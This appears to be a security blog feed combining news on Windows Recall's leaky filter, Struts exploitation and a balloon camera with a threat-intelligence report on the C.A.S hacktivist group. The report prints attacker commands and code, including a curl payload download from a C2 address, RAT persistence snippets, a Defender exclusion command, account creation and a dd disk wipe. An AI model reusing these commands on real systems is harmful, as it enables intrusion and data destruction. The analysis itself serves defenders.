Subito dopo il suo annuncio, Recall è stato pesantemente criticato sia dagli esperti di sicurezza che dai difensori della privacy. Gli esperti hanno paragonato la funzione a un keylogger e hanno dimostrato che con esso si possono rubare dati. In risposta a queste critiche, Microsoft ha ritardato il lancio di Recall e ha affermato che avrebbe fornito ulteriore sicurezza rendendo la funzionalità opzionale e crittografando il database in modo che sia inaccessibile finché l’utente non viene autenticato utilizzando Windows Hello.

L’esperimento di Tom’s Hardware

Secondo Tom’s Hardware, Recall è recentemente diventato di nuovo disponibile per i membri del programma Windows Insiders. La funzione ora dovrebbe crittografare i dati e viene fornita con l’impostazione Filtra informazioni sensibili abilitata per impostazione predefinita, progettata per bloccare la registrazione di app e siti che potrebbero visualizzare numeri di carte bancarie, numeri di previdenza sociale e altre informazioni finanziarie e personali. Tuttavia, i giornalisti hanno scoperto che questo filtro non sempre funziona.

Pertanto, Recall ha catturato con successo il testo dal Blocco note con un nome utente, una password e un numero di carta bancaria casuali, sebbene accanto ad esso fosse scritto il nome della banca e del sistema di pagamento (“Capital One Visa”).

Allo stesso modo, Recall ha ignorato le impostazioni e ha acquisito i dati da una richiesta di prestito completata in formato PDF, aperta in Microsoft Edge. Il documento conteneva un numero di previdenza sociale, nome e data di nascita.

Una funzionalità ancora da migliorare

Anche la creazione di una semplice pagina HTML che diceva direttamente “Inserisci il numero della tua carta di credito” e forniva campi per inserire il numero della carta, il codice CVC e la data di scadenza della carta non ha aiutato ad attivare il filtro. Recall ha catturato e salvato con successo tutti i dati inseriti nel modulo.

Allo stesso tempo, la nuova funzione Microsoft ha rifiutato di acquisire i dati delle carte bancarie dopo aver visitato le pagine di pagamento di due negozi online: Pimoroni e Adafruit. Cioè, per i siti commerciali reali il filtro funzionava ancora.

“Cioè, quando si trattava di veri siti commerciali, Recall ha fatto tutto bene. Tuttavia, il mio esperimento mostra che è quasi impossibile per il filtro AI di Microsoft rilevare tutte le situazioni in cui vengono visualizzate informazioni sensibili sullo schermo ed evitare di catturarle. I miei esempi sono stati pensati per testare un filtro, ma questi non sono casi affatto rari. Le persone inseriscono informazioni personali sensibili nei moduli PDF. Registrano, copiano e incollano i dati in file di testo, quindi li inseriscono in siti che non assomigliano ai tipici siti di negozi”, afferma Avram Piltch, redattore capo di Tom’s Hardware.

Quando la pubblicazione ha contattato i rappresentanti di Microsoft per un commento, la società ha risposto con un collegamento a un post sul blog dedicato a Recall. Dice che gli sviluppatori “stanno continuando a migliorare questa funzionalità” e consiglia di segnalarlo tramite Hub di feedback se trovi informazioni sensibili che dovrebbero essere filtrate.

Allo stesso tempo, Pilch osserva che i dati catturati da Recall sono ora effettivamente crittografati (la forza di questa crittografia sarà sicuramente verificata dai ricercatori di sicurezza) e l’accesso ad essi richiede l’autenticazione tramite Windows Hello. Secondo lui gli screenshot vengono salvati in una sottocartella chiamata AsymStore e non possono essere aperti come PNG, BMP o JPG.

“È possibile che gli hacker riescano a capire come aprire questi file, ma per quanto ne so, l’utente medio non sarà in grado di aprirli al di fuori dell’app Recall”, conclude Pilch.

L'articolo Windows Recall Salva i Dati Delle Carte Di Credito nelle immagini proviene da il blog della sicurezza informatica.

La vulnerabilità critica recentemente risolta in Apache Struts 2 (CVE-2024-53677) viene già utilizzata attivamente dagli hacker e viene attaccata utilizzando exploit proof-of-concept pubblici.

La scorsa settimana, gli sviluppatori Apache hanno reso pubblico il bug critico CVE-2024-53677 (punteggio CVSS 9,5). È stato segnalato che si trattava di un attacco path traversal nel caricamento dei file, consentendo il caricamento di file dannosi (come le shell Web), portando all’esecuzione di codice remoto.

La vulnerabilità colpisce le versioni Struts 2.0.0-2.3.37 (versione obsoleta), 2.5.0-2.5.33 e 6.0.0-6.3.0.2.

“Un utente malintenzionato può manipolare le impostazioni di caricamento dei file per ottenere l’attraversamento del percorso e, in determinate circostanze, ciò potrebbe comportare il caricamento di un file dannoso che può essere utilizzato per l’esecuzione di codice in modalità remota”, hanno scritto gli sviluppatori.

Questa vulnerabilità è simile al vecchio bug CVE-2023-50164 si ritiene che sia dovuta a una correzione inefficace o incompleta.

Gli specialisti dell’ISC SANS stanno già segnalando tentativi di sfruttamento del nuovo problema. Secondo loro, gli aggressori sembrano utilizzare exploit PoC disponibili al pubblico o esserne notevolmente “ispirati”.

Attualmente, gli aggressori mirano a identificare i sistemi vulnerabili utilizzando un exploit per scaricare il file exploit.jsp, che contiene una singola riga di codice per stampare la stringa “Apache Struts”. L’exploit tenta quindi di accedere allo script e verificare che il server sia affetto dal bug o meno.

Si consiglia agli utenti di aggiornare Struts alla versione 6.4.0 il prima possibile e di passare al nuovo meccanismo di caricamento dei file. Il punto è che installare semplicemente una patch non è sufficiente: il codice responsabile della gestione del caricamento dei file nelle applicazioni Struts deve essere riscritto per utilizzare il nuovo meccanismo Action File Upload.

“Continuando a utilizzare il vecchio meccanismo di caricamento file, rimani vulnerabile a tali attacchi”, avverte l’azienda.

L'articolo Struts2: Un Path Traversal porta al caricamento di una Web Shell. La caccia è già iniziata! proviene da il blog della sicurezza informatica.

Does “Pix or it didn’t happen” apply to traveling to the edge of space on a balloon-lofted solar observatory? Yes, it absolutely does.

The breathtaking views on this page come courtesy of IRIS-2, a compact imaging package that creators [Ramón García], [Miguel Angel Gomez], [David Mayo], and [Aitor Conde] recently decided to release as open source hardware. It rode to the edge of space aboard Sunrise III, a balloon-borne solar observatory designed to study solar magnetic fields and atmospheric plasma flows.

To do that the observatory needed a continual view of the Sun over an extended period, so the platform was launched from northern Sweden during the summer of 2024. It rose to 37 km (23 miles) and stayed aloft in the stratosphere tracking the never-setting Sun for six and a half days before landing safely in Canada.

Strictly speaking, IRIS-2 wasn’t part of the primary mission, at least in terms of gathering solar data. Rather, the 5 kg (11 pound) package was designed to provide engineering data about the platform, along with hella cool video of the flight. To that end, it was fitted with four GoPro cameras controlled by an MPS340 microcontroller. The cameras point in different directions to capture all the important action on the platform, like the main telescope slewing to track the sun, as well as details of the balloon system itself.

The controller was programmed to record 4K video at 30 frames per second during launch and landing, plus fifteen minutes of 120 FPS video during the balloon release. The rest of the time, the cameras took a single frame every two minutes, which resulted in some wonderful time-lapse sequences. The whole thing was powered by 56 AA batteries, and judging by the video below it performed flawlessly during the flight, despite the penetrating stratospheric cold and blistering UV exposure.

Hats off to the IRIS-2 team for this accomplishment. Sure, the videos are a delight, but this is more than just eye candy. Seeing how the observatory and balloon platform performed during flight provides valuable engineering data that will no doubt improve future flights.

youtube.com/embed/CKWAjiNBPxo?…

hackaday.com/2024/12/18/catchi…

About C.A.S

C.A.S (Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022. Besides data theft, its goal is to inflict maximum damage, including reputational. To this end, the group’s attacks exploit vulnerabilities in publicly available services and make extensive use of free tools.

Our latest investigation unearthed new activity by the group, explored the attack stages, and analyzed the tools and malware used. In addition, we discovered links between C.A.S and other hacktivist groups, such as the Ukrainian Cyber Alliance and DARKSTAR.

Like most hacktivist groups, C.A.S uses Telegram as a platform to spread information about victims. We found a channel that posts news and messages about the group’s attacks and ideology, as well as a chat hosting a discussion of its activities.

C.A.S on Telegram

Note: this post examines active Telegram channels that we presume to be run by hacktivist groups. Use these sources with caution.

Tactics

This section analyzes the attack chain as per the MITRE ATT&CK framework, as well as the tools we found in the current C.A.S campaign.

Initial Access

C.A.S gains initial access to targeted systems by means of the Exploit Public-Facing Application technique (T1190). The attackers compromise Jira, Confluence and Microsoft SQL Server services using vulnerabilities that we were unable to identify due to the data storage limitations of the attacked segment. However, our analysis of the group leader’s messages in the C.A.S Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. Instead, they likely attack vulnerable network resources or gain access to systems after their compromise by third parties.

Messages from the C.A.S leader known as The Way

Translation:
But I need them to let us into the network mole/fishers

The aim of the C.A.S group is to inflict maximum financial and reputational damage on organizations in Russia and Belarus. In pursuit of this goal, they likely exploit vulnerabilities not only in Jira, Confluence and MS SQL, but in other publicly available services and systems too. What’s more, we are aware of attacks carried out by C.A.S in collaboration with other groups, which is another way they gain initial access and move through victims’ infrastructure.

Message about the group’s methods of gaining initial access

Translation:
but our method is to technically break through the outer perimeter, and those organizations that we need here and now often prefer to maintain 1 site, 2–3 reliable services and not poke around the network once again. so you set yourself the task to hack the company N. naturally, this is done through phishing, but unfortunately, we simply don’t have any fishers in our squad, and our arsenal is not designed for beacon flooding, but for exploits

Execution

To move further through the infrastructure, the threat actors used rare open-source remote access Trojans (RATs), including Revenge RAT and Spark RAT, which we have not seen in attacks by other hacktivists. These utilities allowed them to remotely control the infected systems and execute various commands.

In one incident, we detected the use of a compromised MS SQL service to execute commands in cmd. This was indicated by the cmd.exe process running as a child process of sqlservr.exe.

The attackers also used PowerShell to execute scripts:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
On top of this, the attackers downloaded the Meterpreter reverse shell for the Metasploit framework from the C2 server to the infected host using the cURL tool:
"$system32\cmd.exe",""$system32\cmd.exe" /c cd %appdata% && dir && curl -O
hxxp://185.117.75[.]3:8092/sdc.exe
In some reverse shell incidents, we also found traces of Revenge RAT (48210CA2408DC76815AD1B7C01C1A21A) being run through the PowerShell process:
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\
<exe_name>.exe').EntryPoint.Invoke($null, @())

Persistence

To gain persistence in the system, the threat actors created accounts on compromised hosts using the net.exe utility:
C:\Windows\system32\cmd.exe" /c net user admin cas /add
C:\Windows\system32\cmd.exe" /c net user admin admin123123123 /add
It’s worth noting that they used the password
cas for the admin account, matching the name of the group.
We also found samples of Revenge RAT that had gained persistence in the system by adding registry keys to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
try {
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
true);
try {
if (!((string)((registryKey != null) ? registryKey.GetValue("\"" +
Path.GetFileNameWithoutExtension(Program._installName) + "\"") : null) == text) &&
registryKey != null) {
registryKey.SetValue(fileNameWithoutExtension, "\"" + text + "\"");
}
} catch {
if (registryKey != null) {
registryKey.SetValue(fileNameWithoutExtension, "\"" + text + "\"");
}
}
if (registryKey != null) {
registryKey.Dispose();
}
}
internal static string _installName = "rpchost.exe";
These Trojan samples were additionally copied to the Startup folder:
File.Copy(Application.ExecutablePath, "C:\\Users\\" + Environment.UserName +
"\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" +
Program._installName);

internal static string _ip = "194.36.188.94";
internal static string _installName = "svhost.exe";
During execution, one of the above RAT samples (FC3A8EABD07A221B478A4DDD77DDCE43) created a watchdog timer file called svxhost.exe in the C:\Windows\System32 directory, wrote information to this file, created the NgcMngrSvc service with svxhost.exe as an executable file, and ran this service.

[HandleProcessCorruptedStateExceptions]private static void CreateWatchdog() {
Program.hService = Helper.OpenService(Program.hSCM, "NgcMngrSvc", 4);
if (Program.hService == IntPtr.Zero) {
try {
File.WriteAllBytes(Program.system + "svxhost.exe",
Program.GetResource("dog"));
} catch {
}
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft
Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero,
null, null, null);
}
Helper.StartService(Program.hService, 0, null);
}

Defense Evasion

During our incident investigations, we often noted that the attackers gained full control over information security tools because these were not properly configured. To implement effective anti-attack measures, it is vital to perform regular testing, updating and integration of security systems. A key factor in securing infrastructure is compliance with password-protection policies for access to the information security systems.

In one of the incidents, C.A.S managed to disable an EPP agent without a password, using the rm.ps1 script.
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object {
$_.Matches[0].Value }

if ($guid -ne $null) {
$msiexecCommand2 = "msiexec.exe /x $guid /quiet"
Start-Process -NoNewWindow -FilePath cmd -ArgumentList "/c $msiexecCommand2"
}
The final command to disable the EPP agent was this:
cmd.exe /c msiexec.exe /x {GUID} /quiet
Also, as part of the Defense Evasion technique, the attackers use Revenge RAT to add the $windir\$system32 directory to the Windows Defender exclusion list. This allows the group to hide its activity, because the RAT itself and its malicious payload are both installed in this folder.
"\"$windir\\$system32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden -
Command \"Add-MpPreference -ExclusionPath '$windir\\$system32'\""
And to further reduce the likelihood of detection, the attackers use a malware naming convention that mimics legitimate Windows processes:
C:\Windows\System32\svxhost.exe
C:\Windows\System32\svrhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
C:\Windows\panther\ssbyt.exe

Credential Access

In our study of hacktivist groups (Twelve, BlackJack, Head Mare, Crypt Ghouls and others), we often encountered the use of the same credential extraction tools, namely XenAllPasswordPro, BrowserThief and Mimikatz. These tools have long been known in the community and regularly feature in our crimeware reports.

• XenAllPasswordPro extracts passwords from system storages.
• BrowserThief compromises browser data, including autofill data and saved accounts.
• Mimikatz extracts password hashes from Windows RAM.

C.A.S is no exception: we found these tools in their attacks as well. This is yet further proof that hacktivist groups attacking Russia and Belarus tend to deploy the same arsenal of publicly available utilities.

Discovery

At the infrastructure exploration stage, the attackers made active use of various commands to collect information. Here’s a list of the commands we logged:

The Revenge RAT samples also ran WMI queries to collect information about the operating system and CPU to be sent to the attackers’ command-and-control (C2) server:
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor

Command and Control

To communicate with the C2 server, C.A.S uses various tools. We saw the use of reverse shells generated by the msfvenom tool for the Metasploit framework, as well as publicly available RATs.

Revenge RAT

The attackers first used Revenge RAT to establish a connection to the C2 server, then downloaded and installed the necessary payloads of various frameworks; they also collected data about the infected host and sent it to the server.

We found two similar customized samples of Revenge RAT in the attacks we investigated. Below is a full list of functions found in these variants:

The configuration files for these samples are also similar:

Spark RAT

As mentioned above, the group used another remote access Trojan called Spark RAT. Below is its configuration:
{
  "secure":false,
  "host":"185.117.75.3",
  "port":9610,
  "path":"/",
  "uuid":"3917b41****",
  "key":"aa494c90****"
}
From the IP address specified in the configuration, the attackers downloaded the Meterpreter payload to the victim’s device.

Alongside this, Spark RAT automatically collects and sends the following system information to the C2 server:

Spark RAT provides the operator with a wide range of commands to control the target device. These commands allow both basic operations (such as PING to check client availability, SHUTDOWN to turn off the device, and RESTART to reboot it) as well as more complex ones, such as remote file management (FILES_LIST, FILES_FETCH, FILES_UPLOAD), terminal interaction (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) and remote desktop access (DESKTOP_INIT, DESKTOP_SHOT). Also available to the operator are commands to manage processes (PROCESSES_LIST, PROCESS_KILL) and execute system commands (COMMAND_EXEC).

Meterpreter

In one of the incidents, we found a Meterpreter reverse shell (6CBC93B041165D59EA5DED0C5F377171). Using this, the group was able to gain full access to the compromised system and do the following:

1. Remotely manage the file system;
2. Intercept network traffic;
3. Log keystrokes;
4. Extract password hashes;
5. Perform pivoting techniques through compromised hosts;
6. Monitor the webcam and microphone.

The reverse shell contains the following C2 server address and port:
185.117.75[.]35:4444

Impact

To cause damage to victims, the group encrypts their infrastructure. As we’ve noted before in similar hacktivist attacks, the threat actors’ arsenal consists of leaked LockBit ransomware builders for Windows systems and Babuk for Linux systems. In the majority of C.A.S attacks, encrypted file extensions are generated randomly; but sometimes the number 3119 appears both in the name of the executable file of the ransomware Trojan, and in the extensions added to encrypted files. This number often crops up in C.A.S activity — we see it in usernames, ransom notes, encrypted file extensions and group-related merchandise. It is not a random sequence of digits, but represents the positions of the letters C, A, and S in the alphabet: C is 3, A is 1 and S is 19.

One of the group’s ransomware samples is named 3119.exe. In our investigation of a C.A.S attack involving this sample, we found a ransom note displayed after file encryption in the system:

C.A.S ransom note

Besides encryption, the attackers can destroy data in different segments of the victim’s network or on specific servers. To do this, they first collect information about attached drives using the df system utility:
df -h
Then, to destroy the data, they use the dd system utility, which executes /dev/zero — a file that generates an endless stream of null bytes. The attackers copy null bytes from /dev/zero to the /dev/[VOLUME] partition of their choice in 4 MB blocks. This overwrites the data in the partition with zeros, wiping it forever.
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
This operation allows the attackers to irreversibly destroy data on the victim’s servers.

On Telegram, the perpetrators often confirm their destructive impact on victims’ infrastructure. In their posts, they describe what they did and attach screenshots with the results of their operations. Which part of the infrastructure to encrypt and which to destroy immediately is the attackers’ choice: it depends on the situation.

Public chat message from C.A.S

Translation:
Context: these servers have been down for 3 days, one was erased (namely the volumes with data), the second was encrypted (only the directories with data). Today they were wiped to the root.

Victims

C.A.S targets companies from Russia and Belarus in various industries, including government and commercial organizations, entertainment and technology firms, telecommunications companies and industrial enterprises. This suggests that victims are chosen based on their location, regardless of their field of activity.

The group often writes about its victims on Telegram, posting screenshots of infrastructure, stolen documents and links to cloud storages or forums offering stolen data for download.

Connections to other groups

As mentioned above, besides its Telegram channel, C.A.S hosts a public chat where group members and followers actively communicate. Interestingly, the chat administrators belong not only to C.A.S, but to related groups; one of them, who goes by the name of Sean Townsend, is an administrator of the hacktivist group RUH8 and the press secretary of the Ukrainian Cyber Alliance (U.C.A).

C.A.S Discussions chat administrators and the Telegram account of the C.A.S leader The Way

In its Telegram channel, C.A.S states that it sometimes works with other groups that share its mission to attack organizations from Russia and Belarus. For example, we found posts about joint attacks by C.A.S with U.C.A, RUH8, RM-RF and others:

Message about a joint attack by C.A.S and U.C.A

Message about a joint attack by C.A.S, RUH8 and RM-RF

Translation:
Thanks to colleagues who helped with the last attack

While investigating an incident in the infrastructure of one C.A.S victim, we also found traces of compromise pointing to the DARKSTAR group (also known by the names Shadow and Comet). In one incident, we discovered the following files:

These findings are further evidence of a connection between groups targeting Russian organizations. As part of their collaboration, group members likely share access to victims’ infrastructure, C2 infrastructure and tools. They also exchange information about attacks on Telegram as a way to increase campaign visibility, discredit victims and inflict reputational damage.

Takeaways

The C.A.S group poses a serious threat to organizations in Russia and Belarus. The threat actors attack key industries using an array of tools and techniques that we have observed in the campaigns of other hacktivist groups. C.A.S attacks utilize rare RATs, publicly available remote management tools, and a range of vulnerability exploitation methods. In addition, the group spreads information about its attacks through a public Telegram channel, which causes both financial and reputational damage to victims. A more detailed analysis of C.A.S attacks is available to our Threat Intelligence subscribers.

The group openly confirms that it actively collaborates with other attackers targeting Russia. Joint actions and use of a common infrastructure point to the emergence of a sophisticated attack ecosystem, in which hacktivist groups share resources, tools and access to improve efficiency and scale operations. This strategy not only complicates attribution, but significantly increases the destructive potential of attacks.

To effectively counter such groups, it is vital to harden system defenses, apply regular updates to cybersecurity tools and leverage data analytics for monitoring relevant threat activity. It is also critically important to follow best practices when configuring your information security systems. We strongly recommend the following guides:

• Configuring protection for managed applications;
• Hardening Guide.

Following these instructions will minimize the risks of compromise and increase your system’s resistance to possible attacks.

Indicators of compromise

Revenge RAT

Spark RAT

Meterpreter

File path
C:\windows\System32\svxhost.exe
C:\Windows\system32\svrhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
C:\Windows\panther\ssbyt.exe
C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.exe

IPs
194.36.188[.]94
185.117.75[.]3

securelist.com/cyber-anarchy-s…